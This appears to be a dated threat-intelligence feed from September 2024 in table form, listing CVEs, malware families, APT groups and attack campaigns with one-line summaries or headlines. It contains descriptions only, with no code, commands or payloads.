25.9.24 | CVE-2024-0153 | VULNEREBILITY | CVE | Arm is aware of a number of security vulnerabilities in the Arm Mali GPU Kernel driver and their details are listed below. |
25.9.24 | Splinter | MALWARE | Tool Exploit | Discovering Splinter: A First Look at a New Post-Exploitation Red Team Tool |
25.9.24 | SpAIware | MALWARE | Spyware AI | Spyware Injection Into Your ChatGPT's Long-Term Memory (SpAIware) |
24.9.24 | Polyfill.io Supply Chain Attack | ATTACK | ATTACK | Over 100,000 sites have been impacted by a supply chain attack involving the Polyfill.io service. Polyfill is a popular tool used by hundreds of thousands of sites to enhance browser capabilities, ensuring that all website visitors can use the same codebase for unsupported functionality. |
24.9.24 | Brain Cipher Ransomware Attack | ATTACK | ATTACK | A significant ransomware attack has struck Pusat Data Nasional (PDN), one of Indonesia’s government-owned national data centers. This incident involved threat actors encrypting government data, which disrupted digital services for immigration, airport checks, and several public services. |
24.9.24 | SnakeKeylogger Attack | ATTACK | ATTACK | Threat actors are continuously preying on end users to unknowingly install a trojan stealer known as SnakeKeylogger or KrakenKeylogger. This trojan was developed using .NET and targets Windows users. |
24.9.24 | SectopRAT malware masqueraded as Notion installer in a recent distribution campaign | ALERTS | VIRUS | A new campaign spreading SectopRAT malware has been identified in the wild. The campaign disguises the malware binaries as installer files for known productivity software called Notion. The fake installers are distributed from malicious websites also masquerading as Notion software download portals. |
24.9.24 | Android Malware: Necro Trojan | ALERTS | VIRUS | The latest version of the Necro Trojan has infected various popular applications, including game mods available on Google Play, affecting over 11 million Android devices. This version employs obfuscation to evade detection and uses steganography to conceal its payloads. |
24.9.24 | Earth Baxia: Targeting Asia-Pacific region by exploiting GeoServer vulnerability | ALERTS | CAMPAIGN | According to a recent report from Trend Micro, the threat actor known as Earth Baxia has been targeting government, telecommunications, and energy organizations in the Asia-Pacific region through spear-phishing emails and the exploitation of the GeoServer vulnerability CVE-2024-36401. |
24.9.24 | SambaSpy malware targeting Italian users | ALERTS | VIRUS | SambaSpy RAT has been distributed in a new malicious campaign targeting users from Italy. The campaign has several stages within its infection chain and is leveraging either malware downloaders or droppers depending on the observed run. |
24.9.24 | Go Injector Campaign Deploys Lumma Stealer | ALERTS | VIRUS | Researchers have identified a campaign using Go Injector to deploy Lumma Stealer, a malware designed to steal sensitive information. The attack begins when users visit a harmful website displaying a fake captcha, which tricks them into copying and running a command. This command downloads a zip file containing legitimate-looking files and the Go Injector. The injector then installs Lumma Stealer, which decrypts stolen data and sends it to the attackers. |
24.9.24 | Octo2 | MALWARE | Android | Octo2: European Banks Already Under Attack by New Malware Variant |
24.9.24 | Necro | MALWARE | TROJAN | How the Necro Trojan infiltrated Google Play, again |
23.9.24 | PondRAT | MALWARE | RAT | Gleaming Pisces Poisoned Python Packages Campaign Delivers PondRAT Linux and MacOS Backdoors |
23.9.24 | Earth Baxia | CAMPAIGN | PHISHING | Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC |
22.9.24 | CVE-2024-45694 | VULNEREBILITY | CVE | (9.8 critical): Stack-based buffer overflow, allowing unauthenticated remote attackers to execute arbitrary code on the device. |
22.9.24 | CVE-2024-45695 | VULNEREBILITY | CVE | (9.8 critical): Another stack-based buffer overflow allowing unauthenticated remote attackers to execute arbitrary code. |
22.9.24 | CVE-2024-45696 | VULNEREBILITY | CVE | (8.8 high): Attackers can forcibly enable the telnet service using hard-coded credentials within the local network. |
22.9.24 | CVE-2024-45697 | VULNEREBILITY | CVE | (9.8 critical): Telnet service is enabled when the WAN port is plugged in, allowing remote access with hard-coded credentials. |
22.9.24 | CVE-2024-45698 | VULNEREBILITY | CVE | (8.8 high): Improper input validation in the telnet service allows remote attackers to log in and execute OS commands with hard-coded credentials. |
22.9.24 | A stack-based overflow vulnerability exists in the Microchip Advanced Software Framework (ASF) implementation of the tinydhcp server | ALERT | ALERT | A stack-based overflow vulnerability exists in the tinydhcp server in the Microchip Advanced Software Framework (ASF) that can lead to remote code execution. |
22.9.24 | CVE-2024-8105 | VULNEREBILITY | CVE | A vulnerability related to the use of an insecure Platform Key (PK) has been discovered. An attacker with the compromised PK private key can create malicious UEFI software that is signed with a trusted key that has been compromised. |
22.9.24 | CVE-2024-43461 | VULNEREBILITY | CVE | Windows MSHTML Platform Spoofing Vulnerability |
22.9.24 | Marko Polo | GROUP | GROUP | “Marko Polo” Navigates Uncharted Waters With Infostealer Empire |
21.9.24 | TWELVE | GROUP | GROUP | -=TWELVE=- is back |
20.9.24 | 2024-09-17 - Snake KeyLogger (VIP Recovery), FTP exfil | MALWARE TRAFFIC | MALWARE TRAFFIC | Zip files are password-protected. Of note, this site has a new password scheme. For the password, see the "about" page of this website. |
20.9.24 | 2024-09-16 - Snake KeyLogger (VIP Recovery), SMTP exfil | MALWARE TRAFFIC | MALWARE TRAFFIC | Zip files are password-protected. Of note, this site has a new password scheme. For the password, see the "about" page of this website. |
20.9.24 | North Korean APT group Appleworm delivers PondRAT via poisoned Python packages | ALERTS | APT | An ongoing campaign involving poisoned Python packages delivering backdoors for Linux and macOS, dubbed PondRAT, has been reported. This campaign is believed to be driven by the North Korean APT group Appleworm (also known as AppleJeus, Citrine Sleet, Gleaming Pisces). |
20.9.24 | New campaign targets GitHub users with Lumma Stealer malware via phishing emails | ALERTS | CAMPAIGN | CERT-AGID has reported a new campaign delivering Lumma Stealer malware. As part of this campaign, GitHub users are receiving alarming emails titled “IMPORTANT! Security Vulnerability Detected in Your Repository (Issue #1),” claiming to be from the “GitHub Security Team.” These emails warn recipients of a fabricated security vulnerability and encourage them to click on a suspicious link. |
20.9.24 | UNC1860 | APT | APT | UNC1860 and the Temple of Oats: Iran’s Hidden Hand in Middle Eastern Networks |
20.9.24 | Cracks in the Foundation | HACKING | Vulnerebility | Cracks in the Foundation: Intrusions of FOUNDATION Accounting Software |
20.9.24 | CVE-2024-8963 | VULNEREBILITY | CVE | Security Advisory Ivanti CSA 4.6 (Cloud Services Appliance) (CVE-2024-8963) |
19.9.24 | Vanilla Tempest | CAMPAIGN | Ransomware | Highway Blobbery: Data Theft using Azure Storage Explorer |
19.9.24 | Storm clouds | CAMPAIGN | CAMPAIGN | Storm clouds on the horizon: Resurgence of TeamTNT? |
19.9.24 | CVE-2024-45409 | VULNEREBILITY | CVE | The Ruby SAML library is for implementing the client side of a SAML authorization. Ruby-SAML in <= 12.2 and 1.13.0 <= 1.16.0 does not properly verify the signature of the SAML Response. |
19.9.24 | Raptor Train | BOTNET | BOTNET | Derailing the Raptor Train |
19.9.24 | SambaSpy | MALWARE | RAT | Exotic SambaSpy is now dancing with Italian users |
18.9.24 | New variant of the Gomorrah Stealer identified in the wild | ALERTS | VIRUS | A new variant of the infostealing malware known as Gomorrah Stealer has been identified in the wild. Gomorrah is being offered for sale in the form of a Malware-as-a-Service (MaaS) model. The malware is also actively developed by its creators, who have already announced that version 5.5 of this infostealer will be released soon. |
18.9.24 | MISTPEN | MALWARE | Backdoor | An Offer You Can Refuse: UNC2970 Backdoor Deployment Using Trojanized PDF Reader |
18.9.24 | CVE-2024-38812 | VULNEREBILITY | CVE | VMSA-2024-0019: VMware vCenter Server updates address heap-overflow and privilege escalation vulnerabilities (CVE-2024-38812, CVE-2024-38813) |
17.9.24 | Fireant (APT31) unveils new tools in recent campaign against Asia-Pacific government entities | | APT | The China-linked threat actor known as Fireant (also referred to as Mustang Panda or APT31) has recently been observed using new tools, including PUBLOAD, FDMTP, and PTSOCKET, in espionage attacks targeting government entities in the Asia-Pacific region. |
17.9.24 | Ajina mobile banking trojan | | VIRUS | Ajina is a recently identified mobile banking trojan variant heavily targeting the Central Asia region. The malware focuses on theft of confidential user data including banking details as well as attempts to intercept the 2FA information. |
17.9.24 | Stealthy malware targets US-Taiwan Defense Industry conference attendees | | VIRUS | A malware campaign targeting entities linked to the upcoming US-Taiwan Defense Industry Conference has been reported. Victims are lured with documents containing a ZIP archive and an LNK file disguised as a legitimate PDF registration form. |
17.9.24 | CloudImposer | VULNEREBILITY | CVE | CloudImposer: Executing Code on Millions of Google Servers with a Single Malicious Package |
17.9.24 | Phishing Pages Delivered Through Refresh HTTP Response Header | HACKING | PHISHING | Phishing Pages Delivered Through Refresh HTTP Response Header |
17.9.24 | RustDoor | MALWARE | CRYPTOCURRENCY | North Korean Hackers Target Cryptocurrency Users on LinkedIn with RustDoor Malware |
17.9.24 | Protect Your Crypto | CRYPTOCURRENCY | CRYPTOCURRENCY | Protect Your Crypto: Understanding the Ongoing Global Malware Attacks and What We Are Doing to Stop Them |
17.9.24 | CVE-2024-28991 | VULNEREBILITY | CVE | SolarWinds Access Rights Manager (ARM) Deserialization of Untrusted Data Remote Code Execution Vulnerability (CVE-2024-28991) |
15.9.24 | 2024-09-12 - Approximately 11 days of server scans and probes | MALWARE TRAFFIC | MALWARE TRAFFIC | Zip files are password-protected. Of note, this site has a new password scheme. For the password, see the "about" page of this website. |
15.9.24 | 2024-09-11 - Data Dump: Remcos RAT and XLoader (Formbook) | MALWARE TRAFFIC | MALWARE TRAFFIC | Zip files are password-protected. Of note, this site has a new password scheme. For the password, see the "about" page of this website. |
14.9.24 | About the security content of visionOS 1.3 | VULNEREBILITY | CVE | This document describes the security content of visionOS 1.3. |
14.9.24 | TrickMo | MALWARE | Banking | A new TrickMo saga: from Banking Trojan to Victim's Data Leak |
14.9.24 | CVE-2024-6671 | VULNEREBILITY | CVE | In WhatsUp Gold versions released before 2024.0.0, if the application is configured with only a single user, a SQL Injection vulnerability allows an unauthenticated attacker to retrieve the user's encrypted password. |
14.9.24 | CVE-2024-6670 | VULNEREBILITY | CVE | In WhatsUp Gold versions released before 2024.0.0, a SQL Injection vulnerability allows an unauthenticated attacker to retrieve the user's encrypted password. |
14.9.24 | Hadooken | MALWARE | Linux | Hadooken Malware Targets Weblogic Applications |
13.9.24 | Mekotio and Mispadu malware distributed during Gecko Assault campaign | | VIRUS | A new malicious campaign dubbed Gecko Assault has been reported by the researchers from SCILabs. The threat actors have been distributing two different payloads belonging to the URSA/Mispadu and the Mekotio malware families. |
13.9.24 | AutoIt-based credential flusher leveraged alongside StealC infostealer | | VIRUS | A new campaign delivering the StealC infostealer malware has been observed in the wild. The initial stages of the attack use Amadey malware for loading the infostealer onto the targeted endpoints. In conjunction with the delivered StealC payload, the attackers are leveraging an AutoIt-based credential flusher malware. |
13.9.24 | Hadooken - Linux malware targeting Weblogic servers | | VIRUS | Hadooken is a new Linux malware variant targeting Oracle Weblogic servers. In the initial attack stages the threat actors exploit known vulnerabilities, server misconfigurations or use weak or otherwise compromised credentials to gain access to the targeted environments. Upon execution on the vulnerable server instances, Hadooken drops two distinct payloads: Tsunami malware and another binary used for mining cryptocurrency. |
13.9.24 | ShrinkLocker Ransomware: Leveraging BitLocker for encryption and system disruption | | RANSOM | ShrinkLocker is a recently discovered ransomware that exploits BitLocker, a legitimate Windows feature, to encrypt data and lock users out of their systems. Unlike traditional ransomware, ShrinkLocker uses BitLocker's secure boot partition to make decryption extremely difficult. |
13.9.24 | New Phishing Campaign Exploiting CapCut | | PHISHING | CapCut, a popular video editor, is being exploited in phishing attacks. The latest campaign involves a malicious package that includes a legitimate CapCut app, JamPlus build utility, and a harmful ".lua" script. Running the app triggers JamPlus to execute the script, which then downloads and runs a final payload from a remote server. |
13.9.24 | Veaty and Spearal: Emerging malware in recent campaign against Iraqi Government | | VIRUS | A new malware family, Veaty and Spearal, has been reported by Check Point, a CTA member, as being used in a campaign targeting Iraqi government infrastructure. The malware employs several techniques, including a passive IIS backdoor, DNS tunneling, and command-and-control (C2) communication through compromised email accounts. |
13.9.24 | Ajina.Banker | MALWARE | Banking | Ajina attacks Central Asia: Story of an Uzbek Android Pandemic |
13.9.24 | | MALWARE | TV | Void captures over a million Android TV boxes |
13.9.24 | Proxyjacking | CAMPAIGN | CRYPTOCURRENCY | From Automation to Exploitation: The Growing Misuse of Selenium Grid for Cryptomining and Proxyjacking |
13.9.24 | Spearal | MALWARE | IIS Backdoor | Targeted Iranian Attacks Against Iraqi Government Infrastructure |
13.9.24 | Veaty | MALWARE | IIS Backdoor | Targeted Iranian Attacks Against Iraqi Government Infrastructure |
13.9.24 | OilRig | APT | APT | Targeted Iranian Attacks Against Iraqi Government Infrastructure |
13.9.24 | Quad7 | BOTNET | BOTNET | A glimpse into the Quad7 operators’ next moves and associated botnets |
13.9.24 | DragonRank | GROUP | GROUP | DragonRank, a Chinese-speaking SEO manipulator service provider |
13.9.24 | Yet Another Silly Stealer (YASS) Infostealer | | VIRUS | A new infostealer, being referred to as 'Yet Another Silly Stealer' (YASS), has been observed. While it shares some features with CryptBot, YASS also has distinct characteristics. The research compares YASS to CryptBot, emphasizing YASS's unique code and its delivery via a multi-stage downloader called MustardSandwich. This downloader, executed through a Windows LNK file, involves two JScript stages and two PowerShell stages, with the first PowerShell script run via an ActiveXObject. |
13.9.24 | BLX (aka XLABB) Stealer activity | | VIRUS | BLX Stealer, also known as XLABB Stealer, is a malware variant initially discovered last year. New activity attributed to this infostealer has been observed in the wild. BLX is an open-source malware actively distributed via Telegram and other platforms. Functionality-wise, the malware is capable of stealing confidential data from compromised endpoints. The exfiltration efforts focus on data such as credentials, information stored in browsers, third-party application accounts, Discord tokens, cryptocurrency wallets and others. |
13.9.24 | SEO manipulation leveraged for PlugX and BadIIS malware delivery | | VIRUS | A new malicious campaign attributed to the DragonRank threat group has been discovered by researchers from Cisco Talos. The attackers have been reported to leverage search engine optimization (SEO) manipulation techniques to deploy malicious webshells, collect information off the infected systems as well as to deliver PlugX and BadIIS malware payloads. |
13.9.24 | Ransomware activity surge observed in second quarter of 2024 | | RANSOM | Ransomware activity increased markedly in the second quarter of 2024 as attackers seemingly recovered their momentum following the disruption experienced in late 2023 and early 2024. Analysis of data from ransomware leak sites found that ransomware actors claimed 1,310 attacks in the second quarter of 2024, a 36% increase on the first quarter of this year. This was the second highest number of attacks claimed in a quarter by ransomware operators, short of the record 1,488 attacks claimed in the third quarter of 2023. |
13.9.24 | Linux SSH servers targeted by new SuperShell malware variant | | VIRUS | A SuperShell malware variant has been observed in a recent campaign targeted at vulnerable or otherwise misconfigured Linux SSH servers. The malware is Go-based and can act as a reverse shell, effectively allowing the attackers remote control and remote code execution on the infected machine. The servers compromised with the SuperShell malware are likely to be used later by the attackers for cryptomining or DDoS attacks. |
13.9.24 | ScRansom Ransomware | | | Researchers have found that the CosmicBeetle group is now using a new ransomware dubbed ScRansom, replacing their old Scarab ransomware. They are targeting small and medium businesses worldwide and are copying LockBit's style in their ransom notes and websites. CosmicBeetle is suspected to be affiliated with RansomHub, a recently active ransomware gang that has been increasing its operations since March 2024. |
13.9.24 | VSCode abused by Chinese APT group | | APT | Stately Taurus, a Chinese APT group that carries out cyber-espionage attacks, has abused Visual Studio Code software in espionage operations targeting government entities in Southeast Asia. This threat actor used VSCode’s embedded reverse shell feature to gain a foothold in target networks to execute arbitrary code and deliver additional payloads. They leveraged this mechanism to deliver malware, perform reconnaissance, and exfiltrate sensitive data. |
13.9.24 | New variant of Cicada3301 ransomware found in the wild | | RANSOM | According to a recent report from Palo Alto, Repellent Scorpius is a new ransomware-as-a-service (RaaS) group responsible for the delivery of a ransomware variant dubbed Cicada3301. The threat actors have been observed to leverage a variety of Living-Off-the-Land (LOTL) tools in their attacks. Among them are PsExec for ransomware execution and the Rclone tool for data exfiltration. |
13.9.24 | Mekotio and BBTok malware remain active among the banking trojans targeting LATAM | | VIRUS | Mekotio and BBTok malware variants remain active among the banking trojan families distributed lately across the Latin America region. The malware is usually spread via phishing campaigns utilizing business- or judicial-themed lures. The spam emails leverage either links leading to malicious archive downloads or use malicious attachments directly within the spam emails. While Mekotio is an older malware variant, BBTok was initially discovered only in 2020. Both variants target similar geographical locations and attempt to exfiltrate credentials and sensitive information in order to carry out unauthorized banking operations. |
13.9.24 | Threat actors spoof An Post Ireland services to steal credentials | | CRIME | Symantec has identified a new wave of phishing attacks that impersonate An Post Ireland services to steal credentials. An Post Ireland is a state-owned postal service provider in Ireland. In this campaign, phishing emails are disguised as parcel notifications to reschedule deliveries or check parcel details. The email content is brief, encouraging recipients to click on a phishing URL. Once clicked, victims encounter webpages designed for credential harvesting. |
13.9.24 | SpyAgent: Mobile malware stealing cryptocurrency wallets through image scanning | | VIRUS | A new mobile malware called SpyAgent has been identified targeting mnemonic keys by scanning for images on your device that might contain them. A mnemonic key is a 12-word phrase used to recover cryptocurrency wallets. These secret phrases are highly valuable to threat actors because gaining access to them enables them to restore your wallet on their own devices and steal all the funds stored within. |
13.9.24 | Emerging Loki Backdoor variant employs Mythic Framework and Havoc Techniques | | VIRUS | A new version of the Loki backdoor has been discovered targeting Russian organizations. This variant is compatible with the Mythic framework and utilizes various techniques from the Havoc framework, which complicates analysis. The updated variant is divided into a loader and a DLL. The loader gathers system information from the compromised machine, uploads it to the attacker’s C2 server, and retrieves the DLL in response. The DLL is then loaded into memory to download additional payloads and carry out further attacks. |
11.9.24 | Latrodectus campaign impersonates Antivirus software to deploy remote payloads | | CAMPAIGN | A campaign deploying Latrodectus malware, disguised as a legitimate antivirus vendor, has been reported. The initial attack vector involves phishing and malicious ads. Latrodectus functions as a backdoor, allowing the execution of remote commands and the deployment of malicious payloads such as Brute Ratel C4. It employs common techniques for persistence, including the use of the Windows Component Object Model (COM), and uses TLS certificates for communication with its command-and-control (C2) server. |
11.9.24 | CVE-2024-45195: Remote Code Execution (RCE) vulnerability in Apache OFBiz | VULNEREBILITY | | CVE-2024-45195 is a high-severity (CVSS: 7.5) Remote Code Execution (RCE) vulnerability in Apache OFBiz, a comprehensive suite of business applications. An attacker could likely exploit this vulnerability by framing a specially designed URL that bypasses authentication protocols. If successfully exploited, this vulnerability will allow remote attackers to execute malicious code on the server, potentially leading to complete system compromise. |
11.9.24 | Ongoing exploitation of CVE-2024-36401 in OSGeo GeoServer GeoTools | VULNEREBILITY | | Multiple campaigns are exploiting a recently disclosed security flaw in OSGeo GeoServer GeoTools. The vulnerability, identified as CVE-2024-36401 (with a CVSS score of 9.8), is a critical remote code execution bug that allows malicious actors to take control of affected instances. This flaw has been leveraged to deploy GOREVERSE, a reverse proxy server designed to connect with a command-and-control (C2) server for post-exploitation activities. |
11.9.24 | TIDRONE activities in Taiwan | | GROUP | In recent news, the TIDRONE group has been targeting Taiwan's military and satellite industries, focusing on drone manufacturers. Using malicious tools like CXCLNT and CLNTEND, the group enables data theft, credential dumping, and user control bypass. According to reports, their Tactics, Techniques, and Procedures (TTPs) include supply chain attacks via ERP software, pointing towards espionage motives. |
11.9.24 | Babylon open-source RAT targets Malaysia | | VIRUS | Babylon RAT is an open-source malware variant recently distributed to users in Malaysia. The attack chain involves usage of crafted .iso files mimicking PDF documents. The delivered ISO archive contains a hidden PowerShell script, a decoy PDF document and a malicious executable leading to infection with the Babylon RAT. |
11.9.24 | ToneShell Backdoor Targets IISS Summit | | VIRUS | A cyber espionage campaign involving the ToneShell backdoor, attributed to Mustang Panda, has been reported targeting attendees of the 2024 IISS Defense Summit in Prague. The attack leverages a malicious PIF file disguised as summit documents to gain access to sensitive defense discussions. The malware achieves persistence via registry run keys and scheduled tasks and communicates with a C2 server in Hong Kong using raw TCP that mimics TLS. |
11.9.24 | BlindEagle strikes Colombia's Insurance sector with Quasar RAT variant | | VIRUS | BlindEagle, an advanced persistent threat actor, has been observed targeting Colombia’s insurance sector with the BlotchyQuasar Remote Access Trojan (RAT). The attack chain begins with phishing emails impersonating the Colombian tax authority, containing links to malware hosted on compromised Google Drive accounts. |
11.9.24 | Crimson Palace | CAMPAIGN | APT | Crimson Palace returns: New Tools, Tactics, and Targets |
11.9.24 | Earth Preta | CAMPAIGN | APT | Earth Preta Evolves its Attacks with New Malware and Strategies |
11.9.24 | CVE-2024-38014 | VULNEREBILITY | CVE | (CVSS score: 7.8) - Windows Installer Elevation of Privilege Vulnerability |
11.9.24 | CVE-2024-38217 | VULNEREBILITY | CVE | (CVSS score: 5.4) - Windows Mark-of-the-Web (MotW) Security Feature Bypass Vulnerability |
11.9.24 | CVE-2024-38226 | VULNEREBILITY | CVE | (CVSS score: 7.3) - Microsoft Publisher Security Feature Bypass Vulnerability |
11.9.24 | CVE-2024-43491 | VULNEREBILITY | CVE | (CVSS score: 9.8) - Microsoft Windows Update Remote Code Execution Vulnerability |
11.9.24 | CVE-2024-29847 | VULNEREBILITY | CVE | (CVSS score: 10.0) - A deserialization of untrusted data vulnerability that allows a remote unauthenticated attacker to achieve code execution. |
11.9.24 | CosmicBeetle | GROUP | RANSOMWARE | CosmicBeetle steps up: Probation period at RansomHub |
11.9.24 | PIXHELL | ATTACK | ATTACK | PIXHELL Attack: Leaking Sensitive Information from Air-Gap Computers via 'Singing Pixels' |
11.9.24 | RAMBO | ATTACK | ATTACK | RAMBO: Leaking Secrets from Air-Gap Computers by Spelling Covert Radio Signals from Computer RAM |
9.9.24 | BlindEagle | APT | APT | BlindEagle Targets Colombian Insurance Sector with BlotchyQuasar |
9.9.24 | Mustang Panda | APT | APT | Chinese APT Abuses VSCode to Target Government in Asia |
9.9.24 | WhisperGate | MALWARE | Wiper | WhisperGate is a multi-stage wiper designed to look like ransomware that has been used against multiple government, non-profit, and information technology organizations in Ukraine since at least January 2022. |
9.9.24 | RAMBO | ATTACK | ATTACK | RAMBO: Leaking Secrets from Air-Gap Computers by Spelling Covert Radio Signals from Computer RAM |
9.9.24 | EUCLEAK | ATTACK | ATTACK | Side-Channel Attack on the YubiKey 5 Series |
9.9.24 | CVE-2024-32896 | VULNEREBILITY | CVE | There is a possible way to bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation. |
9.9.24 | CVE-2024-42057 | VULNEREBILITY | CVE | A command injection vulnerability in the IPSec VPN feature of Zyxel ATP series firmware versions from V4.32 through V5.38, USG FLEX series firmware versions from V4.50 through V5.38, USG FLEX 50(W) series firmware versions from V4.16 through |
9.9.24 | CVE-2024-7261 | VULNEREBILITY | CVE | The improper neutralization of special elements in the parameter "host" in the CGI program of Zyxel NWA1123ACv3 firmware version 6.70(ABVT.4) and earlier, WAC500 firmware version 6.70(ABVS.4) and earlier, WAX655E firmware version 7.00(ACDO.1) |
9.9.24 | CVE-2024-7591 | VULNEREBILITY | CVE | Improper Input Validation vulnerability in Progress LoadMaster allows OS Command Injection. This issue affects: * LoadMaster: 7.2.40.0 and above * ECS: All versions * Multi-Tenancy: 7.1.35.4 and above |
9.9.24 | Android SpyAgent | MALWARE | Android | New Android SpyAgent Campaign Steals Crypto Credentials via Image Recognition |
9.9.24 | Loki | MALWARE | Backdoor | Loki: a new private agent for the popular Mythic framework |
9.9.24 | Unit 29155 | GROUP | Military group | Russian Military Cyber Actors Target U.S. and Global Critical Infrastructure |
9.9.24 | TIDRONE | MALWARE | Military Malware | TIDRONE Targets Military and Satellite Industries in Taiwan |
8.9.24 | CVE-2024-41622 | VULNEREBILITY | CVE | Remote Command Execution (RCE) vulnerability via the tomography_ping_address parameter in the /HNAP1/ interface. (CVSS v3 score: 9.8 "critical") |
8.9.24 | CVE-2024-44340 | VULNEREBILITY | CVE | RCE vulnerability via the smartqos_express_devices and smartqos_normal_devices parameters in SetSmartQoSSettings (authenticated access requirement reduces the CVSS v3 score to 8.8 "high"). |
8.9.24 | CVE-2024-44341 | VULNEREBILITY | CVE | RCE vulnerability via the lan(0)_dhcps_staticlist parameter, exploitable through a crafted POST request. (CVSS v3 score: 9.8 "critical") |
8.9.24 | CVE-2024-44342 | VULNEREBILITY | CVE | RCE vulnerability via the wl(0).(0)_ssid parameter. (CVSS v3 score: 9.8 "critical") |
8.9.24 | Cicada3301 | RANSOMWARE | RANSOMWARE | Dissecting the Cicada |
8.9.24 | COVERTCATCH | MALWARE | Python | North Korean Threat Actors Deploy COVERTCATCH Malware via LinkedIn Job Scams |
8.9.24 | CVE-2024-40766 | VULNEREBILITY | CVE | SonicOS Improper Access Control Vulnerability |
8.9.24 | CVE-2024-36401 | EXPLOIT | EXPLOIT | Threat Actors Exploit GeoServer Vulnerability CVE-2024-36401 |
7.9.24 | CVE-2024-44000 | VULNEREBILITY | CVE | Critical Account Takeover Vulnerability Patched in LiteSpeed Cache Plugin |
7.9.24 | CVE-2024-45195 | VULNEREBILITY | CVE | Direct Request ('Forced Browsing') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 18.12.16. Users are recommended to upgrade to version 18.12.16, which fixes the issue. |
7.9.24 | Tropic Trooper | APT | APT | Tropic Trooper spies on government entities in the Middle East |
7.9.24 | Veeam Security Bulletin (September 2024) | VULNEREBILITY | CVE | All vulnerabilities disclosed in this section were discovered during internal testing (unless otherwise indicated) and affect Veeam Backup & Replication 12.1.2.172 and all earlier version 12 builds. |
6.9.24 | Tropic Trooper unleashes new China Chopper variant and Crowdoor loader | APT | | Tropic Trooper, a Chinese-speaking APT group, has been reported targeting Middle Eastern government entities in a cyber espionage campaign. The attackers focused on systems related to human rights studies, using a new China Chopper variant deployed on a compromised Umbraco CMS server. The group employed DLL hijacking to load malicious payloads, including Crowdoor, a loader linked to the SparrowDoor backdoor. |
6.9.24 | Spammers abusing uncommon TLDs | SPAM | | Symantec has recently observed a new phishing campaign being delivered from recently created domains designed to steal credentials and/or banking information. In this campaign we have observed over 200 newly registered domains, most of which are registered with uncommon TLDs such as '.best', '.rest' or '.shop'. The subjects and message content attempt to lure recipients in with promises of dubious health products. |
6.9.24 | Formbook Targets Global Sectors with Fake RFQ from Chemical-Oil Joint Venture | VIRUS | | Symantec has recently observed a Formbook actor impersonating a major joint venture between a global chemical company based in Germany and a national oil and gas company from Malaysia. In this malicious email campaign, they're targeting companies across multiple countries and various industry sectors, including: |
6.9.24 | Acab Infostealer | VIRUS | | Acab is a Python-based infostealing malware variant recently observed in the wild. The malware shows some code similarities to another variant known as 1312 Stealer. Acab has the functionality to extract various confidential information from infected endpoints, including credentials, banking information, crypto-wallet data, application data/tokens, various information stored in web browsers and others. |
6.9.24 | CVE-2024-5932 - GiveWP WordPress Plugin vulnerability | VULNEREBILITY | | CVE-2024-5932 is a recently disclosed vulnerability affecting the GiveWP plugin, which is a Donation and Fundraising Platform plugin for WordPress. The flaw allows for malicious injection within the vulnerable versions of the plugin, up to 3.14.1. Successful exploitation of this flaw might allow unauthenticated attackers to inject an arbitrary PHP Object, which can further lead to arbitrary code execution within the context of the vulnerable application. A patched version 3.14.2 of the plugin has already been released. |
6.9.24 | MacroPack generated payloads distributed in latest campaigns | CAMPAIGN | | A payload generation framework called MacroPack has been leveraged to create miscellaneous payloads in a series of malicious activities recently observed by the researchers from Cisco Talos. The attackers have been using Word, Excel or PowerPoint lures that, once opened, run malicious MacroPack VBA code that ultimately leads to the final payload delivery and execution. Among the distributed payloads were the Brute Ratel and Havoc post-exploitation tools as well as a new variant of the PhantomCore RAT. |
6.9.24 | KTLVdoor backdoor leveraged by the Funnelweb APT | VIRUS | | A new Golang-based backdoor dubbed KTLVdoor has been discovered by researchers from Trend Micro. The malware has been attributed to the Funnelweb APT (also known as Earth Lusca). KTLVdoor is a highly obfuscated malware that comes in variants supporting both Windows and Linux platforms. Functionality-wise, the malware is capable of running commands and shellcode received from the C2 servers and of performing various file and directory operations on the infected machine, including file download/upload, among others. |
6.9.24 | SLOW#TEMPEST campaign targets Chinese entities | CAMPAIGN | | A recently identified malware campaign named SLOW#TEMPEST was uncovered targeting Chinese entities. The attack chain starts by way of malspam attachments in the form of zip files which are bundled with a shortcut lnk file in addition to dll/exe files. Successful execution of the bundled content leads to the establishment of a foothold in the targeted environment. From this position, the attackers can execute further TTPs to accomplish their goals (such as credential harvesting, lateral movement, persistence and privilege escalation). |
6.9.24 | Latrodectus 1.4: New version unveiled with advanced capabilities | VIRUS | | A newer version of the Latrodectus downloader has been observed, featuring enhancements like a new string deobfuscation method, a revised C2 endpoint, and two additional backdoor commands. The infection chain begins with a heavily obfuscated JavaScript file, which uses numerous comments to inflate file size and complexity, complicating analysis. The malware then extracts and executes hidden code, subsequently downloading and installing an MSI file from a remote server. This MSI file loads an obfuscated DLL to perform its malicious tasks. |
5.9.24 | Emansrepo infostealer | VIRUS | | Researchers from Fortinet reported on a new Python-based infostealer variant dubbed Emansrepo. This malware has been distributed via phishing campaigns, with the malicious emails masquerading as purchase invoices or orders. The initial attack chain stage varies depending on the campaign and may leverage different attachments such as .html or .7z. |
5.9.24 | Zharkbot malware | VIRUS | | Zharkbot is a C++-based malware loader variant being dropped by the Amadey trojan in some recently observed campaigns. Zharkbot employs various anti-analysis, anti-VM and sandbox detection/evasion techniques. Once on the compromised machine, the malware will attempt to set up persistence by copying itself to the temp folder and setting up a scheduled task execution. |
5.9.24 | CVE-2024-24809 & CVE-2024-31214 vulnerabilities affecting Traccar 5 | VULNEREBILITY | | CVE-2024-24809 and CVE-2024-31214 are recently disclosed vulnerabilities affecting Traccar 5, which is an open-source GPS tracking system. The vulnerabilities are rated with CVSS scores of 8.5 and 9.7 respectively. Successful exploitation in the affected product versions 5.1 through 5.12 could provide unauthenticated attackers with path traversal and unrestricted upload of arbitrary files. |
5.9.24 | CVE-2024-22319 - JNDI Injection Vulnerability in IBM Operational Decision Manager | VULNEREBILITY | | CVE-2024-22319 is a critical (CVSS: 9.8) JNDI injection vulnerability in IBM Operational Decision Manager. IBM ODM is a comprehensive decision automation solution that helps organizations automate and optimize their decision-making processes. Attackers can exploit this flaw by injecting malicious code into an unchecked argument passed to a specific API through JNDI (Java Naming and Directory Interface). |
5.9.24 | Stone Wolf campaign targets Russian firms with Meduza Stealer malware | CAMPAIGN | | A malicious campaign by the Stone Wolf threat actor targeting Russian firms has been reported. The attackers use phishing emails impersonating a legitimate industrial automation provider to deliver the Meduza Stealer malware. The attack vector involves an archive containing a legitimate document alongside a malicious link to download and execute the Stealer payload. |
